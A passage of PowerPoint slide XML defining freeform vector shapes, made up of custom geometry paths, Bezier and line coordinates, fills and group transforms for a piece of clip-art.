                <a:srgbClr val="FFFF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4" name="Freeform 795"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6675" y="2278"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 56"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 29 w 56"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 56"/>
                  <a:gd name="T5" fmla="*/ 25 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 56"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 56"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 56"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 45 w 56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34">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="38" y="11"/>
                      <a:pt x="29" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="22"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="56" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0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5" name="Freeform 796"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6673" y="2278"/>
                <a:ext cx="104" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 44"/>
                  <a:gd name="T1" fmla="*/ 16 h 26"/>
                  <a:gd name="T2" fmla="*/ 44 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 17 w 44"/>
                  <a:gd name="T5" fmla="*/ 9 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 25 h 26"/>
                  <a:gd name="T8" fmla="*/ 28 w 44"/>
                  <a:gd name="T9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6">
                    <a:moveTo>
                      <a:pt x="28" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="11"/>
                      <a:pt x="43" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="14"/>
                      <a:pt x="1" y="20"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="26"/>
                      <a:pt x="17" y="22"/>
                      <a:pt x="28" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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6" name="Freeform 797"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6824" y="2307"/>
                <a:ext cx="130" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 55"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 30 w 55"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 55"/>
                  <a:gd name="T5" fmla="*/ 24 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 55"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 55"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 55"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 47 w 55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34">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="5"/>
                      <a:pt x="39" y="11"/>
                      <a:pt x="30" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="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7" name="Freeform 798"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6822" y="2304"/>
                <a:ext cx="109" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 46"/>
                  <a:gd name="T1" fmla="*/ 17 h 27"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 16 w 46"/>
                  <a:gd name="T5" fmla="*/ 10 h 27"/>
                  <a:gd name="T6" fmla="*/ 0 w 46"/>
                  <a:gd name="T7" fmla="*/ 25 h 27"/>
                  <a:gd name="T8" fmla="*/ 29 w 46"/>
                  <a:gd name="T9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27">
                    <a:moveTo>
                      <a:pt x="29" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="12"/>
                      <a:pt x="45" y="6"/>
                      <a:pt x="46" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="16" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="15"/>
                      <a:pt x="1" y="21"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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528" name="Group 499"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4435892" y="2468344"/>
              <a:ext cx="905678" cy="620245"/>
              <a:chOff x="3483" y="-5682"/>
              <a:chExt cx="8438" cy="5783"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="529" name="Freeform 500"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="11231" y="-3058"/>
                <a:ext cx="213" cy="414"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 213"/>
                  <a:gd name="T1" fmla="*/ 414 h 414"/>
                  <a:gd name="T2" fmla="*/ 0 w 213"/>
                  <a:gd name="T3" fmla="*/ 55 h 414"/>
                  <a:gd name="T4" fmla="*/ 213 w 213"/>
                  <a:gd name="T5" fmla="*/ 0 h 414"/>
                  <a:gd name="T6" fmla="*/ 213 w 213"/>
                  <a:gd name="T7" fmla="*/ 357 h 414"/>
                  <a:gd name="T8" fmla="*/ 0 w 213"/>
                  <a:gd name="T9" fmla="*/ 4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3" h="414">
                    <a:moveTo>
                      <a:pt x="0" y="414"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="414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30" name="Freeform 501"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="11194" y="-3013"/>
                <a:ext cx="37" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 37"/>
                  <a:gd name="T1" fmla="*/ 10 h 369"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 0 h 369"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 357 h 369"/>
                  <a:gd name="T6" fmla="*/ 37 w 37"/>
                  <a:gd name="T7" fmla="*/ 369 h 369"/>
                  <a:gd name="T8" fmla="*/ 37 w 37"/>
                  <a:gd name="T9" fmla="*/ 10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69">
                    <a:moveTo>
                      <a:pt x="37" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="369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31" name="Freeform 502"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="11194" y="-3069"/>
                <a:ext cx="250" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 250 w 250"/>
                  <a:gd name="T1" fmla="*/ 11 h 66"/>
                  <a:gd name="T2" fmla="*/ 210 w 250"/>
                  <a:gd name="T3" fmla="*/ 0 h 66"/>
                  <a:gd name="T4" fmla="*/ 0 w 250"/>
                  <a:gd name="T5" fmla="*/ 56 h 66"/>
                  <a:gd name="T6" fmla="*/ 37 w 250"/>
                  <a:gd name="T7" fmla="*/ 66 h 66"/>
                  <a:gd name="T8" fmla="*/ 250 w 250"/>
                  <a:gd name="T9" fmla="*/ 1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0" h="66">
                    <a:moveTo>
                      <a:pt x="250" y="11"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="11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32" name="Freeform 503"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10986" y="-2656"/>
                <a:ext cx="245" cy="241"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 245 w 245"/>
                  <a:gd name="T1" fmla="*/ 12 h 241"/>
                  <a:gd name="T2" fmla="*/ 208 w 245"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 0 w 245"/>
                  <a:gd name="T5" fmla="*/ 232 h 241"/>
                  <a:gd name="T6" fmla="*/ 33 w 245"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 245 w 245"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="241">
                    <a:moveTo>
                      <a:pt x="245" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="12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33" name="Freeform 504"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="11019" y="-2656"/>
                <a:ext cx="257" cy="241"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 257"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 57 w 257"/>
                  <a:gd name="T3" fmla="*/ 224 h 241"/>
                  <a:gd name="T4" fmla="*/ 257 w 257"/>
                  <a:gd name="T5" fmla="*/ 0 h 241"/>
                  <a:gd name="T6" fmla="*/ 215 w 257"/>
                  <a:gd name="T7" fmla="*/ 9 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 257"/>
                  <a:gd name="T9" fmla="*/ 241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7" h="241">
                    <a:moveTo>
                      <a:pt x="0" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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34" name="Freeform 505"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="-5682"/>
                <a:ext cx="7215" cy="1937"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3147 w 7215"/>
                  <a:gd name="T1" fmla="*/ 0 h 1937"/>
                  <a:gd name="T2" fmla="*/ 7215 w 7215"/>
                  <a:gd name="T3" fmla="*/ 1094 h 1937"/>
                  <a:gd name="T4" fmla="*/ 4073 w 7215"/>
                  <a:gd name="T5" fmla="*/ 1937 h 1937"/>
                  <a:gd name="T6" fmla="*/ 0 w 7215"/>
                  <a:gd name="T7" fmla="*/ 843 h 1937"/>
                  <a:gd name="T8" fmla="*/ 3147 w 7215"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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15" h="1937">
                    <a:moveTo>
                      <a:pt x="3147" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7215" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4073" y="1937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31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35" name="Freeform 506"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7556" y="-4588"/>
                <a:ext cx="3142" cy="4122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3142"/>
                  <a:gd name="T1" fmla="*/ 843 h 4122"/>
                  <a:gd name="T2" fmla="*/ 3142 w 3142"/>
                  <a:gd name="T3" fmla="*/ 0 h 4122"/>
                  <a:gd name="T4" fmla="*/ 3142 w 3142"/>
                  <a:gd name="T5" fmla="*/ 3279 h 4122"/>
                  <a:gd name="T6" fmla="*/ 0 w 3142"/>
                  <a:gd name="T7" fmla="*/ 4122 h 4122"/>
                  <a:gd name="T8" fmla="*/ 0 w 3142"/>
                  <a:gd name="T9" fmla="*/ 843 h 4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42" h="4122">
                    <a:moveTo>
                      <a:pt x="0" y="843"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3142" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3142" y="3279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="843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36" name="Freeform 507"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8142" y="-1154"/>
                <a:ext cx="864" cy="634"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 115 w 864"/>
                  <a:gd name="T1" fmla="*/ 634 h 634"/>
                  <a:gd name="T2" fmla="*/ 529 w 864"/>
                  <a:gd name="T3" fmla="*/ 504 h 634"/>
                  <a:gd name="T4" fmla="*/ 864 w 864"/>
                  <a:gd name="T5" fmla="*/ 166 h 634"/>
                  <a:gd name="T6" fmla="*/ 276 w 864"/>
                  <a:gd name="T7" fmla="*/ 0 h 634"/>
                  <a:gd name="T8" fmla="*/ 0 w 864"/>
                  <a:gd name="T9" fmla="*/ 296 h 634"/>
                  <a:gd name="T10" fmla="*/ 115 w 864"/>
                  <a:gd name="T11" fmla="*/ 634 h 6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64" h="634">
                    <a:moveTo>
                      <a:pt x="115" y="634"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="529" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="634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37" name="Freeform 508"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4268" y="-1952"/>
                <a:ext cx="867" cy="635"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 118 w 867"/>
                  <a:gd name="T1" fmla="*/ 635 h 635"/>
                  <a:gd name="T2" fmla="*/ 529 w 867"/>
                  <a:gd name="T3" fmla="*/ 506 h 635"/>
                  <a:gd name="T4" fmla="*/ 867 w 867"/>
                  <a:gd name="T5" fmla="*/ 168 h 635"/>
                  <a:gd name="T6" fmla="*/ 278 w 867"/>
                  <a:gd name="T7" fmla="*/ 0 h 635"/>
                  <a:gd name="T8" fmla="*/ 0 w 867"/>
                  <a:gd name="T9" fmla="*/ 298 h 635"/>
                  <a:gd name="T10" fmla="*/ 118 w 867"/>
                  <a:gd name="T11" fmla="*/ 635 h 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67" h="635">
                    <a:moveTo>
                      <a:pt x="118" y="635"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="529" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="63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38" name="Freeform 509"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8484" y="-1005"/>
                <a:ext cx="940" cy="1033"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 318 w 398"/>
                  <a:gd name="T1" fmla="*/ 126 h 437"/>
                  <a:gd name="T2" fmla="*/ 87 w 398"/>
                  <a:gd name="T3" fmla="*/ 27 h 437"/>
                  <a:gd name="T4" fmla="*/ 87 w 398"/>
                  <a:gd name="T5" fmla="*/ 27 h 437"/>
                  <a:gd name="T6" fmla="*/ 22 w 398"/>
                  <a:gd name="T7" fmla="*/ 44 h 437"/>
                  <a:gd name="T8" fmla="*/ 35 w 398"/>
                  <a:gd name="T9" fmla="*/ 72 h 437"/>
                  <a:gd name="T10" fmla="*/ 76 w 398"/>
                  <a:gd name="T11" fmla="*/ 310 h 437"/>
                  <a:gd name="T12" fmla="*/ 188 w 398"/>
                  <a:gd name="T13" fmla="*/ 401 h 437"/>
                  <a:gd name="T14" fmla="*/ 205 w 398"/>
                  <a:gd name="T15" fmla="*/ 437 h 437"/>
                  <a:gd name="T16" fmla="*/ 291 w 398"/>
                  <a:gd name="T17" fmla="*/ 414 h 437"/>
                  <a:gd name="T18" fmla="*/ 291 w 398"/>
                  <a:gd name="T19" fmla="*/ 414 h 437"/>
                  <a:gd name="T20" fmla="*/ 332 w 398"/>
                  <a:gd name="T21" fmla="*/ 395 h 437"/>
                  <a:gd name="T22" fmla="*/ 318 w 398"/>
                  <a:gd name="T23" fmla="*/ 126 h 4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8" h="437">
                    <a:moveTo>
                      <a:pt x="318" y="126"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="40"/>
                      <a:pt x="155" y="0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0" y="131"/>
                      <a:pt x="14" y="228"/>
                      <a:pt x="76" y="310"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="352"/>
                      <a:pt x="148" y="383"/>
                      <a:pt x="188" y="401"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                      <a:pt x="205" y="437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                      <a:pt x="291" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="411"/>
                      <a:pt x="320" y="405"/>
                      <a:pt x="332" y="395"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="398" y="345"/>
                      <a:pt x="392" y="224"/>
                      <a:pt x="318" y="126"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="11111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39" name="Freeform 510"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8276" y="-974"/>
                <a:ext cx="952" cy="1075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 336 w 403"/>
                  <a:gd name="T1" fmla="*/ 405 h 455"/>
                  <a:gd name="T2" fmla="*/ 81 w 403"/>
                  <a:gd name="T3" fmla="*/ 319 h 455"/>
                  <a:gd name="T4" fmla="*/ 67 w 403"/>
                  <a:gd name="T5" fmla="*/ 50 h 455"/>
                  <a:gd name="T6" fmla="*/ 322 w 403"/>
                  <a:gd name="T7" fmla="*/ 136 h 455"/>
                  <a:gd name="T8" fmla="*/ 336 w 403"/>
                  <a:gd name="T9" fmla="*/ 405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3" h="455">
                    <a:moveTo>
                      <a:pt x="336" y="405"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="455"/>
                      <a:pt x="155" y="417"/>
                      <a:pt x="81" y="319"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="221"/>
                      <a:pt x="0" y="101"/>
                      <a:pt x="67" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="0"/>
                      <a:pt x="248" y="38"/>
                      <a:pt x="322" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="234"/>
                      <a:pt x="403" y="354"/>
                      <a:pt x="336" y="405"/>
                    </a:cubicBez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40" name="Freeform 511"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8463" y="-764"/>
                <a:ext cx="579" cy="655"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 204 w 245"/>
                  <a:gd name="T1" fmla="*/ 246 h 277"/>
                  <a:gd name="T2" fmla="*/ 49 w 245"/>
                  <a:gd name="T3" fmla="*/ 194 h 277"/>
                  <a:gd name="T4" fmla="*/ 41 w 245"/>
                  <a:gd name="T5" fmla="*/ 31 h 277"/>
                  <a:gd name="T6" fmla="*/ 196 w 245"/>
                  <a:gd name="T7" fmla="*/ 83 h 277"/>
                  <a:gd name="T8" fmla="*/ 204 w 245"/>
                  <a:gd name="T9" fmla="*/ 246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5" h="277">
                    <a:moveTo>
                      <a:pt x="204" y="246"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="277"/>
                      <a:pt x="94" y="254"/>
                      <a:pt x="49" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="135"/>
                      <a:pt x="0" y="62"/>
                      <a:pt x="41" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="0"/>
                      <a:pt x="151" y="23"/>
                      <a:pt x="196" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241" y="142"/>
                      <a:pt x="245" y="216"/>
                      <a:pt x="204" y="2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41" name="Freeform 512"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10249" y="-3736"/>
                <a:ext cx="1672" cy="2998"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1672"/>
                  <a:gd name="T1" fmla="*/ 0 h 2998"/>
                  <a:gd name="T2" fmla="*/ 602 w 1672"/>
                  <a:gd name="T3" fmla="*/ 163 h 2998"/>
                  <a:gd name="T4" fmla="*/ 1020 w 1672"/>
                  <a:gd name="T5" fmla="*/ 1245 h 2998"/>
                  <a:gd name="T6" fmla="*/ 1672 w 1672"/>
                  <a:gd name="T7" fmla="*/ 1593 h 2998"/>
                  <a:gd name="T8" fmla="*/ 1672 w 1672"/>
                  <a:gd name="T9" fmla="*/ 2998 h 2998"/>
                  <a:gd name="T10" fmla="*/ 0 w 1672"/>
                  <a:gd name="T11" fmla="*/ 2547 h 2998"/>
                  <a:gd name="T12" fmla="*/ 0 w 1672"/>
                  <a:gd name="T13" fmla="*/ 0 h 29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72" h="2998">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="602" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1020" y="1245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1672" y="1593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1672" y="2998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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42" name="Freeform 513"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8612" y="-3573"/>
                <a:ext cx="2657" cy="1682"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2657"/>
                  <a:gd name="T1" fmla="*/ 600 h 1682"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2657"/>
                  <a:gd name="T3" fmla="*/ 0 h 1682"/>
                  <a:gd name="T4" fmla="*/ 2657 w 2657"/>
                  <a:gd name="T5" fmla="*/ 1082 h 1682"/>
                  <a:gd name="T6" fmla="*/ 418 w 2657"/>
                  <a:gd name="T7" fmla="*/ 1682 h 1682"/>
                  <a:gd name="T8" fmla="*/ 0 w 2657"/>
                  <a:gd name="T9" fmla="*/ 600 h 1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57" h="1682">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2657" y="1082"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
